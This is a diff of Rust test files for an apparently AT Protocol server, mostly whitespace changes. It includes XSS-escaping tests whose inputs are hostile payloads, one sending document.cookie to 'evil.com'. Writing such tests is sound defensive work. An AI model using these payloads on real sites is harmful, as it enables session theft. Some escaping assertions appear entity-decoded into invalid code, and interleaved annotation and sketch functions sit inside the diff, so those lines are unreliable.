103
117
assert!(!is_valid_phone_number(input), "Malicious input '{}' should be rejected", input);
104
118
}
105
119
}
120
+
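The phone-number tests read like an E.164 check: a leading `+`, then digits only, with an upper bound on length. A sketch consistent with every case above (hypothetical name; the 15-digit cap is the E.164 maximum and an assumption about the real helper):

```rust
// Sketch of an E.164-style check: '+' followed by 1..=15 ASCII digits, nothing else.
fn is_valid_phone_number_sketch(value: &str) -> bool {
    match value.strip_prefix('+') {
        Some(digits) => {
            !digits.is_empty()
                && digits.len() <= 15
                && digits.chars().all(|c| c.is_ascii_digit())
        }
        None => false,
    }
}
```

Rejecting anything outside that alphabet is also what blocks the shell-metacharacter payloads in the command-injection test above.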
106
121
#[test]
107
122
fn test_image_file_size_limit_enforced() {
108
123
let processor = ImageProcessor::new();
···
119
134
Ok(_) => panic!("Should reject files over size limit"),
120
135
}
121
136
}
137
+
122
138
#[test]
123
139
fn test_image_file_size_limit_configurable() {
124
140
let processor = ImageProcessor::new().with_max_file_size(1024);
···
126
142
let result = processor.process(&data, "image/jpeg");
127
143
assert!(result.is_err(), "Should reject files over configured limit");
128
144
}
145
+
129
146
#[test]
130
147
fn test_oauth_template_xss_escaping_client_id() {
131
148
let malicious_client_id = "<script>alert('xss')</script>";
···
133
150
assert!(!html.contains("<script>"), "Script tags should be escaped");
134
151
assert!(html.contains("&lt;script&gt;"), "HTML entities should be used for escaping");
135
152
}
153
+
136
154
#[test]
137
155
fn test_oauth_template_xss_escaping_client_name() {
138
156
let malicious_client_name = "<img src=x onerror=alert('xss')>";
···
140
158
assert!(!html.contains("<img "), "IMG tags should be escaped");
141
159
assert!(html.contains("&lt;img"), "IMG tag should be escaped as HTML entity");
142
160
}
161
+
143
162
#[test]
144
163
fn test_oauth_template_xss_escaping_scope() {
145
164
let malicious_scope = "\"><script>alert('xss')</script>";
146
165
let html = login_page("client123", None, Some(malicious_scope), "test-uri", None, None);
147
166
assert!(!html.contains("<script>"), "Script tags in scope should be escaped");
148
167
}
168
+
149
169
#[test]
150
170
fn test_oauth_template_xss_escaping_error_message() {
151
171
let malicious_error = "<script>document.location='http://evil.com?c='+document.cookie</script>";
152
172
let html = login_page("client123", None, None, "test-uri", Some(malicious_error), None);
153
173
assert!(!html.contains("<script>"), "Script tags in error should be escaped");
154
174
}
175
+
155
176
#[test]
156
177
fn test_oauth_template_xss_escaping_login_hint() {
157
178
let malicious_hint = "\" onfocus=\"alert('xss')\" autofocus=\"";
···
159
180
assert!(!html.contains("onfocus=\"alert"), "Event handlers should be escaped in login hint");
160
181
assert!(html.contains("""), "Quotes should be escaped");
161
182
}
183
+
162
184
#[test]
163
185
fn test_oauth_template_xss_escaping_request_uri() {
164
186
let malicious_uri = "\" onmouseover=\"alert('xss')\"";
165
187
let html = login_page("client123", None, None, malicious_uri, None, None);
166
188
assert!(!html.contains("onmouseover=\"alert"), "Event handlers should be escaped in request_uri");
167
189
}
190
+
168
191
#[test]
169
192
fn test_oauth_error_page_xss_escaping() {
170
193
let malicious_error = "<script>steal()</script>";
···
173
196
assert!(!html.contains("<script>"), "Script tags should be escaped in error page");
174
197
assert!(!html.contains("<img "), "IMG tags should be escaped in error page");
175
198
}
199
+
176
200
#[test]
177
201
fn test_oauth_success_page_xss_escaping() {
178
202
let malicious_name = "<script>steal_session()</script>";
179
203
let html = success_page(Some(malicious_name));
180
204
assert!(!html.contains("<script>"), "Script tags should be escaped in success page");
181
205
}
206
+
182
207
#[test]
183
208
fn test_oauth_template_no_javascript_urls() {
184
209
let html = login_page("client123", None, None, "test-uri", None, None);
···
188
213
let success_html = success_page(None);
189
214
assert!(!success_html.contains("javascript:"), "Success page should not contain javascript: URLs");
190
215
}
216
+
191
217
#[test]
192
218
fn test_oauth_template_form_action_safe() {
193
219
let malicious_uri = "javascript:alert('xss')//";
194
220
let html = login_page("client123", None, None, malicious_uri, None, None);
195
221
assert!(html.contains("action=\"/oauth/authorize\""), "Form action should be fixed URL");
196
222
}
223
+
197
224
#[test]
198
225
fn test_send_error_types_have_display() {
199
226
let timeout = SendError::Timeout;
···
203
230
assert!(!format!("{}", max_retries).is_empty());
204
231
assert!(!format!("{}", invalid_recipient).is_empty());
205
232
}
233
+
206
234
#[test]
207
235
fn test_send_error_timeout_message() {
208
236
let error = SendError::Timeout;
209
237
let msg = format!("{}", error);
210
238
assert!(msg.to_lowercase().contains("timeout"), "Timeout error should mention timeout");
211
239
}
240
+
212
241
#[test]
213
242
fn test_send_error_max_retries_includes_detail() {
214
243
let error = SendError::MaxRetriesExceeded("Server returned 503".to_string());
215
244
let msg = format!("{}", error);
216
245
assert!(msg.contains("503") || msg.contains("retries"), "MaxRetriesExceeded should include context");
217
246
}
247
+
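// Note: hypothetical sketch (not the crate's SendError definition): a Display impl
// shaped so the assertions above hold -- the timeout message mentions "timeout" and
// MaxRetriesExceeded carries its detail string. Other variants, including the
// invalid-recipient case constructed in the elided lines, are omitted here.
#[derive(Debug)]
enum SendErrorSketch {
    Timeout,
    MaxRetriesExceeded(String),
}

impl std::fmt::Display for SendErrorSketch {
    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
        match self {
            SendErrorSketch::Timeout => write!(f, "send timeout"),
            SendErrorSketch::MaxRetriesExceeded(detail) => {
                write!(f, "max retries exceeded: {detail}")
            }
        }
    }
}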
218
248
#[tokio::test]
219
249
async fn test_check_signup_queue_accepts_session_jwt() {
220
250
use common::{base_url, client, create_account_and_login};
···
231
261
let body: serde_json::Value = res.json().await.unwrap();
232
262
assert_eq!(body["activated"], true);
233
263
}
264
+
234
265
#[tokio::test]
235
266
async fn test_check_signup_queue_no_auth() {
236
267
use common::{base_url, client};
···
245
276
let body: serde_json::Value = res.json().await.unwrap();
246
277
assert_eq!(body["activated"], true);
247
278
}
279
+
248
280
#[test]
249
281
fn test_html_escape_ampersand() {
250
282
let html = login_page("client&test", None, None, "test-uri", None, None);
251
283
assert!(html.contains("&"), "Ampersand should be escaped");
252
284
assert!(!html.contains("client&test"), "Raw ampersand should not appear in output");
253
285
}
286
+
254
287
#[test]
255
288
fn test_html_escape_quotes() {
256
289
let html = login_page("client\"test'more", None, None, "test-uri", None, None);
257
290
assert!(html.contains(""") || html.contains("""), "Double quotes should be escaped");
258
291
assert!(html.contains("'") || html.contains("'"), "Single quotes should be escaped");
259
292
}
293
+
260
294
#[test]
261
295
fn test_html_escape_angle_brackets() {
262
296
let html = login_page("client<test>more", None, None, "test-uri", None, None);
···
264
298
assert!(html.contains(">"), "Greater than should be escaped");
265
299
assert!(!html.contains("<test>"), "Raw angle brackets should not appear");
266
300
}
301
+
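// Note: hypothetical helper sketch -- the templates' actual escaping code is not in
// this diff. A minimal escaper satisfying the entity assertions above replaces the
// five HTML-significant characters before interpolation into the page.
fn escape_html_sketch(input: &str) -> String {
    let mut out = String::with_capacity(input.len());
    for c in input.chars() {
        match c {
            '&' => out.push_str("&amp;"),
            '<' => out.push_str("&lt;"),
            '>' => out.push_str("&gt;"),
            '"' => out.push_str("&quot;"),
            '\'' => out.push_str("&#x27;"),
            _ => out.push(c),
        }
    }
    out
}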
267
302
#[test]
268
303
fn test_oauth_template_preserves_safe_content() {
269
304
let html = login_page("my-safe-client", Some("My Safe App"), Some("read write"), "valid-uri", None, Some("user@example.com"));
···
271
306
assert!(html.contains("read write") || html.contains("read"), "Scope should be preserved");
272
307
assert!(html.contains("user@example.com"), "Login hint should be preserved");
273
308
}
309
+
274
310
#[test]
275
311
fn test_csrf_like_input_value_protection() {
276
312
let malicious = "\" onclick=\"alert('csrf')";
277
313
let html = login_page("client", None, None, malicious, None, None);
278
314
assert!(!html.contains("onclick=\"alert"), "Event handlers should not be executable");
279
315
}
316
+
280
317
#[test]
281
318
fn test_unicode_handling_in_templates() {
282
319
let unicode_client = "客户端 クライアント";
283
320
let html = login_page(unicode_client, None, None, "test-uri", None, None);
284
321
assert!(html.contains("客户端") || html.contains("&#"), "Unicode should be preserved or encoded");
285
322
}
323
+
286
324
#[test]
287
325
fn test_null_byte_in_input() {
288
326
let with_null = "client\0id";
289
327
let sanitized = sanitize_header_value(with_null);
290
328
assert!(sanitized.contains("client"), "Content before null should be preserved");
291
329
}
330
+
292
331
#[test]
293
332
fn test_very_long_input_handling() {
294
333
let long_input = "x".repeat(10000);
+17
tests/server.rs
···
4
4
use helpers::verify_new_account;
5
5
use reqwest::StatusCode;
6
6
use serde_json::{Value, json};
7
+
7
8
#[tokio::test]
8
9
async fn test_health() {
9
10
let client = client();
···
15
16
assert_eq!(res.status(), StatusCode::OK);
16
17
assert_eq!(res.text().await.unwrap(), "OK");
17
18
}
19
+
18
20
#[tokio::test]
19
21
async fn test_describe_server() {
20
22
let client = client();
···
30
32
let body: Value = res.json().await.expect("Response was not valid JSON");
31
33
assert!(body.get("availableUserDomains").is_some());
32
34
}
35
+
33
36
#[tokio::test]
34
37
async fn test_create_session() {
35
38
let client = client();
···
69
72
let body: Value = res.json().await.expect("Response was not valid JSON");
70
73
assert!(body.get("accessJwt").is_some());
71
74
}
75
+
72
76
#[tokio::test]
73
77
async fn test_create_session_missing_identifier() {
74
78
let client = client();
···
90
94
res.status()
91
95
);
92
96
}
97
+
93
98
#[tokio::test]
94
99
async fn test_create_account_invalid_handle() {
95
100
let client = client();
···
113
118
"Expected 400 for invalid handle chars"
114
119
);
115
120
}
121
+
116
122
#[tokio::test]
117
123
async fn test_get_session() {
118
124
let client = client();
···
127
133
.expect("Failed to send request");
128
134
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
129
135
}
136
+
130
137
#[tokio::test]
131
138
async fn test_refresh_session() {
132
139
let client = client();
···
188
195
assert_ne!(body["accessJwt"].as_str().unwrap(), access_jwt);
189
196
assert_ne!(body["refreshJwt"].as_str().unwrap(), refresh_jwt);
190
197
}
198
+
191
199
#[tokio::test]
192
200
async fn test_delete_session() {
193
201
let client = client();
···
202
210
.expect("Failed to send request");
203
211
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
204
212
}
213
+
205
214
#[tokio::test]
206
215
async fn test_get_service_auth_success() {
207
216
let client = client();
···
230
239
assert_eq!(claims["sub"], did);
231
240
assert_eq!(claims["aud"], "did:web:example.com");
232
241
}
242
+
233
243
#[tokio::test]
234
244
async fn test_get_service_auth_with_lxm() {
235
245
let client = client();
···
255
265
assert_eq!(claims["iss"], did);
256
266
assert_eq!(claims["lxm"], "com.atproto.repo.getRecord");
257
267
}
268
+
258
269
#[tokio::test]
259
270
async fn test_get_service_auth_no_auth() {
260
271
let client = client();
···
272
283
let body: Value = res.json().await.expect("Response was not valid JSON");
273
284
assert_eq!(body["error"], "AuthenticationRequired");
274
285
}
286
+
275
287
#[tokio::test]
276
288
async fn test_get_service_auth_missing_aud() {
277
289
let client = client();
···
287
299
.expect("Failed to send request");
288
300
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
289
301
}
302
+
290
303
#[tokio::test]
291
304
async fn test_check_account_status_success() {
292
305
let client = client();
···
308
321
assert!(body["repoRev"].is_string());
309
322
assert!(body["indexedRecords"].is_number());
310
323
}
324
+
311
325
#[tokio::test]
312
326
async fn test_check_account_status_no_auth() {
313
327
let client = client();
···
323
337
let body: Value = res.json().await.expect("Response was not valid JSON");
324
338
assert_eq!(body["error"], "AuthenticationRequired");
325
339
}
340
+
326
341
#[tokio::test]
327
342
async fn test_activate_account_success() {
328
343
let client = client();
···
338
353
.expect("Failed to send request");
339
354
assert_eq!(res.status(), StatusCode::OK);
340
355
}
356
+
341
357
#[tokio::test]
342
358
async fn test_activate_account_no_auth() {
343
359
let client = client();
···
351
367
.expect("Failed to send request");
352
368
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
353
369
}
370
+
354
371
#[tokio::test]
355
372
async fn test_deactivate_account_success() {
356
373
let client = client();
+10
tests/signing_key.rs
···
4
4
use serde_json::{json, Value};
5
5
use sqlx::PgPool;
6
6
use helpers::verify_new_account;
7
+
7
8
async fn get_pool() -> PgPool {
8
9
let conn_str = common::get_db_connection_string().await;
9
10
sqlx::postgres::PgPoolOptions::new()
···
12
13
.await
13
14
.expect("Failed to connect to test database")
14
15
}
16
+
15
17
#[tokio::test]
16
18
async fn test_reserve_signing_key_without_did() {
17
19
let client = common::client();
···
34
36
"Signing key should be in did:key format with multibase prefix"
35
37
);
36
38
}
39
+
37
40
#[tokio::test]
38
41
async fn test_reserve_signing_key_with_did() {
39
42
let client = common::client();
···
63
66
assert_eq!(row.did.as_deref(), Some(target_did));
64
67
assert_eq!(row.public_key_did_key, signing_key);
65
68
}
69
+
66
70
#[tokio::test]
67
71
async fn test_reserve_signing_key_stores_private_key() {
68
72
let client = common::client();
···
91
95
assert!(row.used_at.is_none(), "Reserved key should not be marked as used yet");
92
96
assert!(row.expires_at > chrono::Utc::now(), "Key should expire in the future");
93
97
}
98
+
94
99
#[tokio::test]
95
100
async fn test_reserve_signing_key_unique_keys() {
96
101
let client = common::client();
···
121
126
let key2 = body2["signingKey"].as_str().unwrap();
122
127
assert_ne!(key1, key2, "Each call should generate a unique signing key");
123
128
}
129
+
124
130
#[tokio::test]
125
131
async fn test_reserve_signing_key_is_public() {
126
132
let client = common::client();
···
140
146
"reserveSigningKey should work without authentication"
141
147
);
142
148
}
149
+
143
150
#[tokio::test]
144
151
async fn test_create_account_with_reserved_signing_key() {
145
152
let client = common::client();
···
190
197
"Reserved key should be marked as used"
191
198
);
192
199
}
200
+
193
201
#[tokio::test]
194
202
async fn test_create_account_with_invalid_signing_key() {
195
203
let client = common::client();
···
213
221
let body: Value = res.json().await.unwrap();
214
222
assert_eq!(body["error"], "InvalidSigningKey");
215
223
}
224
+
216
225
#[tokio::test]
217
226
async fn test_create_account_cannot_reuse_signing_key() {
218
227
let client = common::client();
···
268
277
.unwrap()
269
278
.contains("already used"));
270
279
}
280
+
271
281
#[tokio::test]
272
282
async fn test_reserved_key_tokens_work() {
273
283
let client = common::client();
+4
tests/sync_blob.rs
···
3
3
use reqwest::StatusCode;
4
4
use reqwest::header;
5
5
use serde_json::Value;
6
+
6
7
#[tokio::test]
7
8
async fn test_list_blobs_success() {
8
9
let client = client();
···
35
36
let cids = body["cids"].as_array().unwrap();
36
37
assert!(!cids.is_empty());
37
38
}
39
+
38
40
#[tokio::test]
39
41
async fn test_list_blobs_not_found() {
40
42
let client = client();
···
52
54
let body: Value = res.json().await.expect("Response was not valid JSON");
53
55
assert_eq!(body["error"], "RepoNotFound");
54
56
}
57
+
55
58
#[tokio::test]
56
59
async fn test_get_blob_success() {
57
60
let client = client();
···
91
94
let body = res.text().await.expect("Failed to get body");
92
95
assert_eq!(body, blob_content);
93
96
}
97
+
94
98
#[tokio::test]
95
99
async fn test_get_blob_not_found() {
96
100
let client = client();
+14
tests/sync_deprecated.rs
···
4
4
use helpers::*;
5
5
use reqwest::StatusCode;
6
6
use serde_json::Value;
7
+
7
8
#[tokio::test]
8
9
async fn test_get_head_success() {
9
10
let client = client();
···
23
24
let root = body["root"].as_str().unwrap();
24
25
assert!(root.starts_with("bafy"), "Root CID should be a CID");
25
26
}
27
+
26
28
#[tokio::test]
27
29
async fn test_get_head_not_found() {
28
30
let client = client();
···
40
42
assert_eq!(body["error"], "HeadNotFound");
41
43
assert!(body["message"].as_str().unwrap().contains("Could not find root"));
42
44
}
45
+
43
46
#[tokio::test]
44
47
async fn test_get_head_missing_param() {
45
48
let client = client();
···
53
56
.expect("Failed to send request");
54
57
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
55
58
}
59
+
56
60
#[tokio::test]
57
61
async fn test_get_head_empty_did() {
58
62
let client = client();
···
69
73
let body: Value = res.json().await.expect("Response was not valid JSON");
70
74
assert_eq!(body["error"], "InvalidRequest");
71
75
}
76
+
72
77
#[tokio::test]
73
78
async fn test_get_head_whitespace_did() {
74
79
let client = client();
···
83
88
.expect("Failed to send request");
84
89
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
85
90
}
91
+
86
92
#[tokio::test]
87
93
async fn test_get_head_changes_after_record_create() {
88
94
let client = client();
···
112
118
let head2 = body2["root"].as_str().unwrap().to_string();
113
119
assert_ne!(head1, head2, "Head CID should change after record creation");
114
120
}
121
+
115
122
#[tokio::test]
116
123
async fn test_get_checkout_success() {
117
124
let client = client();
···
137
144
assert!(!body.is_empty(), "CAR file should not be empty");
138
145
assert!(body.len() > 50, "CAR file should contain actual data");
139
146
}
147
+
140
148
#[tokio::test]
141
149
async fn test_get_checkout_not_found() {
142
150
let client = client();
···
153
161
let body: Value = res.json().await.expect("Response was not valid JSON");
154
162
assert_eq!(body["error"], "RepoNotFound");
155
163
}
164
+
156
165
#[tokio::test]
157
166
async fn test_get_checkout_missing_param() {
158
167
let client = client();
···
166
175
.expect("Failed to send request");
167
176
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
168
177
}
178
+
169
179
#[tokio::test]
170
180
async fn test_get_checkout_empty_did() {
171
181
let client = client();
···
180
190
.expect("Failed to send request");
181
191
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
182
192
}
193
+
183
194
#[tokio::test]
184
195
async fn test_get_checkout_empty_repo() {
185
196
let client = client();
···
197
208
let body = res.bytes().await.expect("Failed to get body");
198
209
assert!(!body.is_empty(), "Even empty repo should return CAR header");
199
210
}
211
+
200
212
#[tokio::test]
201
213
async fn test_get_checkout_includes_multiple_records() {
202
214
let client = client();
···
218
230
let body = res.bytes().await.expect("Failed to get body");
219
231
assert!(body.len() > 500, "CAR file with 5 records should be larger");
220
232
}
233
+
221
234
#[tokio::test]
222
235
async fn test_get_head_matches_latest_commit() {
223
236
let client = client();
···
246
259
let latest_cid = latest_body["cid"].as_str().unwrap();
247
260
assert_eq!(head_root, latest_cid, "getHead root should match getLatestCommit cid");
248
261
}
262
+
249
263
#[tokio::test]
250
264
async fn test_get_checkout_car_header_valid() {
251
265
let client = client();
+18
tests/sync_repo.rs
···
5
5
use reqwest::StatusCode;
6
6
use reqwest::header;
7
7
use serde_json::{Value, json};
8
+
8
9
#[tokio::test]
9
10
async fn test_get_latest_commit_success() {
10
11
let client = client();
···
24
25
assert!(body["cid"].is_string());
25
26
assert!(body["rev"].is_string());
26
27
}
28
+
27
29
#[tokio::test]
28
30
async fn test_get_latest_commit_not_found() {
29
31
let client = client();
···
41
43
let body: Value = res.json().await.expect("Response was not valid JSON");
42
44
assert_eq!(body["error"], "RepoNotFound");
43
45
}
46
+
44
47
#[tokio::test]
45
48
async fn test_get_latest_commit_missing_param() {
46
49
let client = client();
···
54
57
.expect("Failed to send request");
55
58
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
56
59
}
60
+
57
61
#[tokio::test]
58
62
async fn test_list_repos() {
59
63
let client = client();
···
76
80
assert!(repo["head"].is_string());
77
81
assert!(repo["active"].is_boolean());
78
82
}
83
+
79
84
#[tokio::test]
80
85
async fn test_list_repos_with_limit() {
81
86
let client = client();
···
97
102
let repos = body["repos"].as_array().unwrap();
98
103
assert!(repos.len() <= 2);
99
104
}
105
+
100
106
#[tokio::test]
101
107
async fn test_list_repos_pagination() {
102
108
let client = client();
···
135
141
assert_ne!(repos[0]["did"], repos2[0]["did"]);
136
142
}
137
143
}
144
+
138
145
#[tokio::test]
139
146
async fn test_get_repo_status_success() {
140
147
let client = client();
···
155
162
assert_eq!(body["active"], true);
156
163
assert!(body["rev"].is_string());
157
164
}
165
+
158
166
#[tokio::test]
159
167
async fn test_get_repo_status_not_found() {
160
168
let client = client();
···
172
180
let body: Value = res.json().await.expect("Response was not valid JSON");
173
181
assert_eq!(body["error"], "RepoNotFound");
174
182
}
183
+
175
184
#[tokio::test]
176
185
async fn test_notify_of_update() {
177
186
let client = client();
···
187
196
.expect("Failed to send request");
188
197
assert_eq!(res.status(), StatusCode::OK);
189
198
}
199
+
190
200
#[tokio::test]
191
201
async fn test_request_crawl() {
192
202
let client = client();
···
202
212
.expect("Failed to send request");
203
213
assert_eq!(res.status(), StatusCode::OK);
204
214
}
215
+
205
216
#[tokio::test]
206
217
async fn test_get_repo_success() {
207
218
let client = client();
···
245
256
let body = res.bytes().await.expect("Failed to get body");
246
257
assert!(!body.is_empty());
247
258
}
259
+
248
260
#[tokio::test]
249
261
async fn test_get_repo_not_found() {
250
262
let client = client();
···
262
274
let body: Value = res.json().await.expect("Response was not valid JSON");
263
275
assert_eq!(body["error"], "RepoNotFound");
264
276
}
277
+
265
278
#[tokio::test]
266
279
async fn test_get_record_sync_success() {
267
280
let client = client();
···
312
325
let body = res.bytes().await.expect("Failed to get body");
313
326
assert!(!body.is_empty());
314
327
}
328
+
315
329
#[tokio::test]
316
330
async fn test_get_record_sync_not_found() {
317
331
let client = client();
···
334
348
let body: Value = res.json().await.expect("Response was not valid JSON");
335
349
assert_eq!(body["error"], "RecordNotFound");
336
350
}
351
+
337
352
#[tokio::test]
338
353
async fn test_get_blocks_success() {
339
354
let client = client();
···
369
384
Some("application/vnd.ipld.car")
370
385
);
371
386
}
387
+
372
388
#[tokio::test]
373
389
async fn test_get_blocks_not_found() {
374
390
let client = client();
···
383
399
.expect("Failed to send request");
384
400
assert_eq!(res.status(), StatusCode::NOT_FOUND);
385
401
}
402
+
386
403
#[tokio::test]
387
404
async fn test_sync_record_lifecycle() {
388
405
let client = client();
···
491
508
"Second post should still be accessible"
492
509
);
493
510
}
511
+
494
512
#[tokio::test]
495
513
async fn test_sync_repo_export_lifecycle() {
496
514
let client = client();
+3
tests/verify_live_commit.rs
···
3
3
use std::collections::HashMap;
4
4
use std::str::FromStr;
5
5
mod common;
6
+
6
7
#[tokio::test]
7
8
async fn test_verify_live_commit() {
8
9
let client = reqwest::Client::new();
···
51
52
}
52
53
}
53
54
}
55
+
54
56
fn commit_unsigned_bytes(commit: &jacquard_repo::commit::Commit<'_>) -> Vec<u8> {
55
57
#[derive(serde::Serialize)]
56
58
struct UnsignedCommit<'a> {
···
72
74
};
73
75
serde_ipld_dagcbor::to_vec(&unsigned).unwrap()
74
76
}
77
+
75
78
fn parse_car(cursor: &mut std::io::Cursor<&[u8]>) -> Result<(Vec<Cid>, HashMap<Cid, Bytes>), Box<dyn std::error::Error>> {
76
79
use std::io::Read;
77
80
fn read_varint<R: Read>(r: &mut R) -> std::io::Result<u64> {